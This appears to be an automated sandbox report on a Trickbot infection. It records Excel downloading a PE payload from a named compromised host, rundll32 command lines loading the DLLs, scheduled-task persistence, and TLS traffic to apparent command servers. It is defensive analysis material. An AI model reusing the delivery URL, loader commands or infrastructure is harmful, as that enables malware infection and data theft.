                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.240113020 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.240119934 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.240128994 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.240137100 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.240151882 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.240170956 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.240174055 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.240181923 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.240194082 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.240211010 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.240211010 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.240226030 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.240231991 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.240245104 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.240267992 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.240288019 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.240308046 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.240328074 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.240329981 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.240349054 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.240365028 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.240374088 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.240394115 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.240411997 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.240423918 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.240423918 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.240459919 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.241363049 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.297489882 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.297517061 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.297533035 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.297550917 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.297584057 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.297601938 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.297617912 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.297619104 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.297642946 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.297646999 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.297648907 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.297650099 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.297665119 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.297667980 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.297686100 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.297698021 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.297703028 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.297710896 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.297724009 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.297736883 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.297749996 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.297761917 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.297826052 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.297847986 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.297864914 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.297874928 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.297883034 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.297889948 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.297909975 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.297925949 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.297952890 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.297979116 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.297997952 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.298006058 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.298028946 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.298029900 CET8049165185.81.0.78192.168.2.22

                                                                                                                                                                                                                  UDP Packets

                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                  Feb 20, 2021 09:48:07.978209019 CET5219753192.168.2.228.8.8.8
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.037940979 CET53521978.8.8.8192.168.2.22
                                                                                                                                                                                                                  Feb 20, 2021 09:48:19.789324045 CET5309953192.168.2.228.8.8.8
                                                                                                                                                                                                                  Feb 20, 2021 09:48:19.843091011 CET53530998.8.8.8192.168.2.22
                                                                                                                                                                                                                  Feb 20, 2021 09:48:19.858103991 CET5283853192.168.2.228.8.8.8
                                                                                                                                                                                                                  Feb 20, 2021 09:48:19.906888008 CET53528388.8.8.8192.168.2.22
                                                                                                                                                                                                                  Feb 20, 2021 09:49:07.491444111 CET6120053192.168.2.228.8.8.8
                                                                                                                                                                                                                  Feb 20, 2021 09:49:07.551477909 CET53612008.8.8.8192.168.2.22
                                                                                                                                                                                                                  Feb 20, 2021 09:49:07.557696104 CET4954853192.168.2.228.8.8.8
                                                                                                                                                                                                                  Feb 20, 2021 09:49:07.618220091 CET53495488.8.8.8192.168.2.22
                                                                                                                                                                                                                  Feb 20, 2021 09:49:07.935848951 CET5562753192.168.2.228.8.8.8
                                                                                                                                                                                                                  Feb 20, 2021 09:49:07.984754086 CET53556278.8.8.8192.168.2.22
                                                                                                                                                                                                                  Feb 20, 2021 09:49:07.987725019 CET5600953192.168.2.228.8.8.8
                                                                                                                                                                                                                  Feb 20, 2021 09:49:08.039216995 CET53560098.8.8.8192.168.2.22
                                                                                                                                                                                                                  Feb 20, 2021 09:49:11.780280113 CET6186553192.168.2.228.8.8.8
                                                                                                                                                                                                                  Feb 20, 2021 09:49:11.846560955 CET53618658.8.8.8192.168.2.22
                                                                                                                                                                                                                  Feb 20, 2021 09:49:11.849558115 CET5517153192.168.2.228.8.8.8
                                                                                                                                                                                                                  Feb 20, 2021 09:49:11.912435055 CET53551718.8.8.8192.168.2.22
                                                                                                                                                                                                                  Feb 20, 2021 09:49:11.916096926 CET5249653192.168.2.228.8.8.8
                                                                                                                                                                                                                  Feb 20, 2021 09:49:12.074311018 CET53524968.8.8.8192.168.2.22
                                                                                                                                                                                                                  Feb 20, 2021 09:49:12.078605890 CET5756453192.168.2.228.8.8.8
                                                                                                                                                                                                                  Feb 20, 2021 09:49:12.137561083 CET53575648.8.8.8192.168.2.22
                                                                                                                                                                                                                  Feb 20, 2021 09:49:12.141418934 CET6300953192.168.2.228.8.8.8
                                                                                                                                                                                                                  Feb 20, 2021 09:49:12.232424974 CET53630098.8.8.8192.168.2.22

                                                                                                                                                                                                                  DNS Queries

                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                                                  Feb 20, 2021 09:48:07.978209019 CET192.168.2.228.8.8.80xb648Standard query (0)www.chipmania.itA (IP address)IN (0x0001)
                                                                                                                                                                                                                  Feb 20, 2021 09:49:07.491444111 CET192.168.2.228.8.8.80xa0c2Standard query (0)ident.meA (IP address)IN (0x0001)
                                                                                                                                                                                                                  Feb 20, 2021 09:49:07.557696104 CET192.168.2.228.8.8.80xfa16Standard query (0)ident.meA (IP address)IN (0x0001)
                                                                                                                                                                                                                  Feb 20, 2021 09:49:11.780280113 CET192.168.2.228.8.8.80x1d23Standard query (0)38.52.17.84.zen.spamhaus.orgA (IP address)IN (0x0001)
                                                                                                                                                                                                                  Feb 20, 2021 09:49:11.849558115 CET192.168.2.228.8.8.80xc63dStandard query (0)38.52.17.84.cbl.abuseat.orgA (IP address)IN (0x0001)
                                                                                                                                                                                                                  Feb 20, 2021 09:49:11.916096926 CET192.168.2.228.8.8.80xea66Standard query (0)38.52.17.84.b.barracudacentral.orgA (IP address)IN (0x0001)
                                                                                                                                                                                                                  Feb 20, 2021 09:49:12.078605890 CET192.168.2.228.8.8.80x87a5Standard query (0)38.52.17.84.dnsbl-1.uceprotect.netA (IP address)IN (0x0001)
                                                                                                                                                                                                                  Feb 20, 2021 09:49:12.141418934 CET192.168.2.228.8.8.80x376dStandard query (0)38.52.17.84.spam.dnsbl.sorbs.netA (IP address)IN (0x0001)

                                                                                                                                                                                                                  DNS Answers

                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.037940979 CET8.8.8.8192.168.2.220xb648No error (0)www.chipmania.itchipmania.itCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.037940979 CET8.8.8.8192.168.2.220xb648No error (0)chipmania.it185.81.0.78A (IP address)IN (0x0001)
                                                                                                                                                                                                                  Feb 20, 2021 09:49:07.551477909 CET8.8.8.8192.168.2.220xa0c2No error (0)ident.me176.58.123.25A (IP address)IN (0x0001)
                                                                                                                                                                                                                  Feb 20, 2021 09:49:07.618220091 CET8.8.8.8192.168.2.220xfa16No error (0)ident.me176.58.123.25A (IP address)IN (0x0001)
                                                                                                                                                                                                                  Feb 20, 2021 09:49:11.846560955 CET8.8.8.8192.168.2.220x1d23Name error (3)38.52.17.84.zen.spamhaus.orgnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                                  Feb 20, 2021 09:49:11.912435055 CET8.8.8.8192.168.2.220xc63dName error (3)38.52.17.84.cbl.abuseat.orgnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                                  Feb 20, 2021 09:49:12.074311018 CET8.8.8.8192.168.2.220xea66Name error (3)38.52.17.84.b.barracudacentral.orgnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                                  Feb 20, 2021 09:49:12.137561083 CET8.8.8.8192.168.2.220x87a5Name error (3)38.52.17.84.dnsbl-1.uceprotect.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                                  Feb 20, 2021 09:49:12.232424974 CET8.8.8.8192.168.2.220x376dName error (3)38.52.17.84.spam.dnsbl.sorbs.netnonenoneA (IP address)IN (0x0001)

                                                                                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                                                                                  • www.chipmania.it

                                                                                                                                                                                                                  HTTP Packets

                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                  0192.168.2.2249165185.81.0.7880C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.114717007 CET0OUTGET /mails/open.php HTTP/1.1
                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                  UA-CPU: AMD64
                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                                                  Host: www.chipmania.it
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.181039095 CET2INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Date: Sat, 20 Feb 2021 08:48:08 GMT
                                                                                                                                                                                                                  Server: Apache
                                                                                                                                                                                                                  Content-Disposition: attachment; filename="10.jjkes"
                                                                                                                                                                                                                  Upgrade: h2,h2c
                                                                                                                                                                                                                  Connection: Upgrade, Keep-Alive
                                                                                                                                                                                                                  Keep-Alive: timeout=1, max=100
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                  Data Raw: 32 30 30 30 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd 2a 96 79 f9 4b f8 2a f9 4b f8 2a f9 4b f8 2a a2 23 fb 2b f3 4b f8 2a a2 23 fd 2b 7e 4b f8 2a a2 23 fc 2b eb 4b f8 2a 01 3b fc 2b f6 4b f8 2a 01 3b fb 2b e8 4b f8 2a a2 23 f9 2b fc 4b f8 2a f9 4b f9 2a 9a 4b f8 2a 01 3b fd 2b d8 4b f8 2a 4e 3a f1 2b f4 4b f8 2a 4e 3a f8 2b f8 4b f8 2a 4e 3a 07 2a f8 4b f8 2a 4e 3a fa 2b f8 4b f8 2a 52 69 63 68 f9 4b f8 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 a4 73 2f 60 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 1b 00 72 42 00 00 a4 03 00 00 00 00 00 c2 7d 41 00 00 10 00 00 00 90 42 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 46 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 20 8f 44 00 60 01 00 00 80 90 44 00 3c 00 00 00 00 c0 44 00 58 70 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 46 00 b0 11 00 00 60 81 44 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 81 44 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 42 00 58 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 df 71 42 00 00 10 00 00 00 72 42 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 18 08 02 00 00 90 42 00 00 0a 02 00 00 76 42 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 15 00 00 00 a0 44 00 00 0a 00 00 00 80 44 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 58 70 01 00 00 c0 44 00 00 72 01 00 00 8a 44 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 b0 11 00 00 00 40 46 00 00 12 00 00 00 fc 45 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 68 1a e6 68 07 ba 91 2f 00 00 33 c9 e8 ff 3c 08 00 6a 00 ff d0 33 c0 c3 cc cc cc cc cc cc cc cc
                                                                                                                                                                                                                  Data Ascii: 2000MZ@!L!This program cannot be run in DOS mode.$*yK*K*K*#+K*#+~K*#+K*;+K*;+K*#+K*K*K*;+K*N:+K*N:+K*N:*K*N:+K*RichK*PELs/`!rB}AB`F@ D`D<DXp@F`DpD@BX.textqBrB `.rdataBvB@@.data8DD@.rsrcXpDrD@@.reloc@FE@Bhh/3<j3


                                                                                                                                                                                                                  HTTPS Packets

                                                                                                                                                                                                                  TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                                                                                  Feb 20, 2021 09:48:19.343115091 CET45.155.173.242443192.168.2.2249166CN=Koqnu, O=Qjvoobim, L=DavhlVuwmxy, C=ZZCN=Koqnu, O=Qjvoobim, L=DavhlVuwmxy, C=ZZThu Oct 01 03:17:34 CEST 2020Sun Sep 29 03:17:34 CEST 2030769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,10-11-23-65281,23-24,08c4a22651d328568ec66382a84fc505f
                                                                                                                                                                                                                  Feb 20, 2021 09:49:06.177721024 CET193.8.194.96443192.168.2.2249170CN=example.com, OU=IT Department, O=Global Security, L=London, ST=London, C=GBCN=example.com, OU=IT Department, O=Global Security, L=London, ST=London, C=GBSun Feb 07 20:26:06 CET 2021Mon Feb 07 20:26:06 CET 2022769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,10-11-23-65281,23-24,08c4a22651d328568ec66382a84fc505f
                                                                                                                                                                                                                  Feb 20, 2021 09:49:07.733053923 CET176.58.123.25443192.168.2.2249171CN=ident.me CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Fri Jan 22 12:53:12 CET 2021 Wed Oct 07 21:21:40 CEST 2020Thu Apr 22 13:53:12 CEST 2021 Wed Sep 29 21:21:40 CEST 2021769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,005af1f5ca1b87cc9cc9b25185115607d
                                                                                                                                                                                                                  CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
                                                                                                                                                                                                                  Feb 20, 2021 09:49:16.239937067 CET193.8.194.96443192.168.2.2249173CN=example.com, OU=IT Department, O=Global Security, L=London, ST=London, C=GBCN=example.com, OU=IT Department, O=Global Security, L=London, ST=London, C=GBSun Feb 07 20:26:06 CET 2021Mon Feb 07 20:26:06 CET 2022769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,10-11-23-65281,23-24,08c4a22651d328568ec66382a84fc505f

                                                                                                                                                                                                                  Code Manipulations

                                                                                                                                                                                                                  Statistics

                                                                                                                                                                                                                  Behavior

                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                  System Behavior

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Start time:09:47:37
                                                                                                                                                                                                                  Start date:20/02/2021
                                                                                                                                                                                                                  Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                                                                                                                                                  Imagebase:0x13f400000
                                                                                                                                                                                                                  File size:27641504 bytes
                                                                                                                                                                                                                  MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Start time:09:47:43
                                                                                                                                                                                                                  Start date:20/02/2021
                                                                                                                                                                                                                  Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:rundll32 ..\BASE.BABAA,DllRegisterServer
                                                                                                                                                                                                                  Imagebase:0xffc50000
                                                                                                                                                                                                                  File size:45568 bytes
                                                                                                                                                                                                                  MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Start time:09:47:44
                                                                                                                                                                                                                  Start date:20/02/2021
                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:rundll32 ..\BASE.BABAA,DllRegisterServer
                                                                                                                                                                                                                  Imagebase:0x820000
                                                                                                                                                                                                                  File size:44544 bytes
                                                                                                                                                                                                                  MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                  • Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000004.00000002.2098758914.0000000000230000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                                  • Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000004.00000003.2094809366.0000000000324000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                                  • Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000004.00000003.2094797786.0000000000324000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                                  • Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000004.00000002.2099036393.0000000000878000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                                  • Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000004.00000002.2098808409.00000000002F0000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                                                                                                                                  Reputation:moderate

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Start time:09:47:45
                                                                                                                                                                                                                  Start date:20/02/2021
                                                                                                                                                                                                                  Path:C:\Windows\System32\wermgr.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:C:\Windows\system32\wermgr.exe
                                                                                                                                                                                                                  Imagebase:0xff2b0000
                                                                                                                                                                                                                  File size:50688 bytes
                                                                                                                                                                                                                  MD5 hash:41DF7355A5A907E2C1D7804EC028965D
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Reputation:moderate

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Start time:09:47:45
                                                                                                                                                                                                                  Start date:20/02/2021
                                                                                                                                                                                                                  Path:C:\Windows\System32\wermgr.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:C:\Windows\system32\wermgr.exe
                                                                                                                                                                                                                  Imagebase:0xff2b0000
                                                                                                                                                                                                                  File size:50688 bytes
                                                                                                                                                                                                                  MD5 hash:41DF7355A5A907E2C1D7804EC028965D
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Reputation:moderate

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Start time:09:48:50
                                                                                                                                                                                                                  Start date:20/02/2021
                                                                                                                                                                                                                  Path:C:\Windows\System32\taskeng.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:taskeng.exe {C999D15C-7BEE-4793-989A-0EF4E6A22007} S-1-5-18:NT AUTHORITY\System:Service:
                                                                                                                                                                                                                  Imagebase:0xffe70000
                                                                                                                                                                                                                  File size:464384 bytes
                                                                                                                                                                                                                  MD5 hash:65EA57712340C09B1B0C427B4848AE05
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Reputation:moderate

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Start time:09:48:50
                                                                                                                                                                                                                  Start date:20/02/2021
                                                                                                                                                                                                                  Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:C:\Windows\system32\rundll32.EXE 'C:\Users\user\AppData\Roaming\QNetMonitor3154395120\ujBASEmc.rrd',DllRegisterServer
                                                                                                                                                                                                                  Imagebase:0xffd70000
                                                                                                                                                                                                                  File size:45568 bytes
                                                                                                                                                                                                                  MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                                  Disassembly

                                                                                                                                                                                                                  Code Analysis

                                                                                                                                                                                                                  Reset < >